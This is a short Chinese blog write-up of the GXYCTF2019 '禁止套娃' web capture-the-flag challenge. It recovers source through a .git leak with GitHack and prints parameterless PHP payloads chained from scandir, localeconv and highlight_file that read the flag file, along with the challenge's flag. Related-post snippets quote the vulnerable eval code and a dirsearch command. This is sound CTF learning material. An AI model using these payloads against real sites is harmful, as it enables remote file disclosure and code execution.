[GXYCTF2019] web题-禁止套娃

最新推荐文章于 2022-06-29 15:43:47 发布
最新推荐文章于 2022-06-29 15:43:47 发布
阅读量755 收藏
点赞数
分类专栏: CTF练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BROTHERYY/article/details/107638782
版权

复现环境:buuoj.cn

使用GitHack下载源码index.php
在这里插入图片描述
使用
print_r(scandir(current(localeconv())));查看目录
在这里插入图片描述最终完整exp:
?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));
在这里插入图片描述

用到的函数
print_r()
scandir()
localeconv()
current()
next()
array_reverse()
highlight_file()

flag{361b5f11-834a-416b-b410-4e986347506f}

BROTHERYY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3653
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
无参数函数RCE+[GXYCTF2019]禁止套娃 1
bazzza的博客
12-27 905
目录无参数RCE常用函数数组操作array_fliparray_randarray_reversecurrent文件file_get_contents()readfile()highlight_file()[别名:show_source()]scandir()direname()getcwd()chdir($directory)读取环境变量get_defined_vars()getenvlocaleconv()phpversion()会话session_idsession_start其它[GXYCTF201
[GXYCTF2019]禁止套娃
pakho_C的博客
02-26 5677
web第37 [GXYCTF2019]禁止套娃 打开靶场 审计源代码无发现,使用dirmap进行目录扫描 发现.git目录,猜测存在.git源码泄露,参考: CTF-WEB:Git 源码泄露 git文件致源码泄露 使用githack工具下载到.git文件夹下的index.php文件 index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_m
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1416
对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解过程: (一)在上面传送门的那个师傅的博
[GXYCTF2019]禁止套娃 WP
Yang_99的博客
08-06 421
1.第一步是.git文件泄露 用GitHack.py跑一下得到源码index.php 2.读源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]
[GXYCTF2019]禁止套娃(.git泄露,无参RCE)
xlcvv的博客
04-17 3413
这里fuzz了一下,已经确认是源码泄露了,因为都没什么线索了,但是这问就来了,用dirsearch扫的话,就会因为访问次数过快,导致扫描不出来,啊,那就瞄一下师傅们的wp叭! .git源码泄露,用GitHack拿到index.php: 看到了eval($_GET['exp']),就是一句话木马的GET方式,目又加了好多过滤限制了REC,这就考验做者的积累了(我小白积累太少了)。 看代码,第...
[ctf web]从 [GXYCTF2019]禁止套娃 开始的无参数函数RCE
ShenZ的博客
08-15 320
无参数函数RCE [GXYCTF2019]禁止套娃 wp 无参数函数RCE sky大佬yyds!rce一定要看大佬的文章!!link
【学习笔记3】buu [GXYCTF2019]禁止套娃
weixin_43553654的博客
05-08 352
知识点:1. /.git泄露2.无参数RCE3.各种php函数的使用解 首先登录进去后发现什么都没有,查看源码,抓包也什么都没信息,去瞄了一眼大佬的wp知道了这是.git文件泄露从而导致的源码的泄露,不过别人是用扫描器跑出来的,可是我试了一试,因为我请求的次数太多,什么都没有跑出来。不过知道后就可以用Githack脚本跑了,这个脚本是python2环境,可以放在kali下跑,命令就是p...
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2575
BUUCTF记录贴
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 466
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
ctfshow套娃shell
最新发布
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值